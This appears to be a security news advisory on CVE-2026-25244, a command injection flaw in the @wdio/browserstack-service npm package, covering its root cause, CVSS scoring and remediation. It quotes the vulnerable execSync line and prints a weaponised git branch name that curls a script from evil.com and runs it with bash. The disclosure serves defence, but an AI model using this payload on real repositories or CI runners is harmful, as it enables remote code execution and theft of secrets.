A critical command injection vulnerability tracked as CVE-2026-25244 has been discovered in the widely used @wdio/browserstack-service npm package, allowing attackers to achieve remote code execution (RCE) on CI/CD servers and developer machines by exploiting unsanitized git branch names during test orchestration. With a CVSS score of 9.8 (Critical), every engineering team using @wdio/browserstack-service versions ≤ 9.23.2 must patch immediately.
WebdriverIO is a battle-tested, open-source test automation framework that supports unit, end-to-end, and component testing via the WebDriver, WebDriver BiDi, and Appium protocols.
Critical RCE Flaw Hits WebdriverIO BrowserStack
The @wdio/browserstack-service plugin, downloaded millions of times across enterprise DevOps pipelines, extends WebdriverIO with BrowserStack integration for cross-browser testing and smart test orchestration.
This attack surface is significant: CI/CD environments typically run with elevated permissions and store sensitive secrets such as SSH keys, API tokens, and environment credentials, making them prime targets for supply chain attacks.
The root cause lies in a single line of code in helpers.ts, the test orchestration helper file at webdriverio/packages/wdio-browserstack-service/src/testorchestration/helpers.ts (line 204). The offending code interpolates the git branch names directly into a Node.js execSync() shell call, inside a template literal:

```typescript
const changedFilesOutput = execSync(`git diff --name-only ${baseBranch}..${currentBranch}`).toString().trim()
```
Git's ref-name rules forbid spaces but legitimately permit shell metacharacters such as semicolons, backticks, dollar signs and braces in branch names. An attacker who needs a space in a payload simply writes ${IFS}, which /bin/sh expands to its internal field separator (whitespace) before running the command.
The getGitMetadataForAISelection() function, responsible for gathering AI-selection metadata during smart test runs, retrieves the branch name and passes it directly to the shell without any sanitization or escaping, a textbook CWE-78 (OS Command Injection) weakness.
The exploit chain is dangerously straightforward and requires no authentication. An attacker crafts a malicious git repository with a weaponized branch name, such as:
```shell
git checkout -b "main;curl${IFS}evil.com/evil.sh${IFS}>/tmp/evil.sh;bash${IFS}/tmp/evil.sh;echo${IFS}PWNED"
```
The attacker then configures WebdriverIO to point to this repository via testOrchestrationOptions.runSmartSelection.source.
Critically, if the source field is omitted entirely, the service defaults to the current working directory, meaning any developer who clones a poisoned repository and runs npm run wdio with test orchestration active is exposed without any explicit source configuration.
When test orchestration triggers getGitMetadataForAISelection(), the shell interprets the malicious payload embedded in the branch name and executes attacker-controlled commands.
The vulnerability scores 9.8 (Critical) on the CVSS v3.1 scale, with High impact across all three impact dimensions.
| CVSS Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
The CVSS vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. The "Privileges Required: None" and "User Interaction: None" ratings make this especially alarming: an attacker needs neither a foothold in the target environment nor any victim action beyond the standard npm run wdio command. The trigger is still the victim's own pipeline running test orchestration against a checkout whose branch name the attacker controls, which is exactly what a poisoned clone or a pull request from a fork provides.
Successful exploitation delivers a devastating range of outcomes across the software development lifecycle. Attackers can steal environment variables, API keys, secrets, and credentials stored on the CI/CD runner.
Beyond secret theft, adversaries can exfiltrate source code and SSH keys, install persistent backdoors, perform lateral movement within internal networks, and, most dangerously, tamper with build artifacts to poison downstream software distributions in a classic supply chain attack.
Given the widespread adoption of WebdriverIO in enterprise QA pipelines, the blast radius of a targeted campaign exploiting this flaw could span entire software supply chains.
Affected Versions
All @wdio/browserstack-service versions <= 9.23.2 are vulnerable. The flaw was responsibly disclosed via GitHub Security Advisory GHSA-5c46-x3qw-q7j7, published on May 11, 2026, by maintainer erwinheitzman, with credit to reporter hayageek.
The patch was released in version 9.24.0, which properly sanitizes git branch names before they are interpolated into shell commands.
Remediation
Take the following actions immediately to protect your environment:
- Upgrade now: Run `npm install @wdio/browserstack-service@^9.24.0` to patch the vulnerability
- Audit your wdio.conf.js: Review all testOrchestrationOptions.runSmartSelection.source entries for untrusted repository paths
- Sanitize branch names: Implement allow-listing or regex validation for git branch names in any internal tooling that passes them to shell commands, and prefer argument-vector spawning (execFileSync with an array of arguments) over string-built shell commands
- Restrict CI/CD permissions: Run test runners under the least-privileged service account to limit the blast radius of any future RCE
- Monitor for anomalies: Deploy Sigma detection rules to flag suspicious execSync-triggered process spawning on CI runners
- Scan your pipeline: Use tools like `npm audit` and SAST scanners to detect any lingering versions of the vulnerable package
FAQ
Q1: What is CVE-2026-25244?
It is a critical (CVSS 9.8) command injection flaw in @wdio/browserstack-service ≤ 9.23.2 that allows unauthenticated remote code execution via maliciously named git branches.
Q2: Do I need to be using a malicious repository to be exploited?
No. If you omit the source field in runSmartSelection, the service defaults to the current directory, so any poisoned repository you clone and run tests in is an attack vector.
Q3: How do I fix the vulnerability?
Upgrade @wdio/browserstack-service to version 9.24.0 or later, which sanitizes branch names before shell interpolation.
Q4: Can this vulnerability be exploited in automated CI/CD pipelines without human interaction?
Yes, the flaw requires no user interaction or privileges, making it fully exploitable in automated pipeline environments with no manual steps.
Site: thecybrdef.com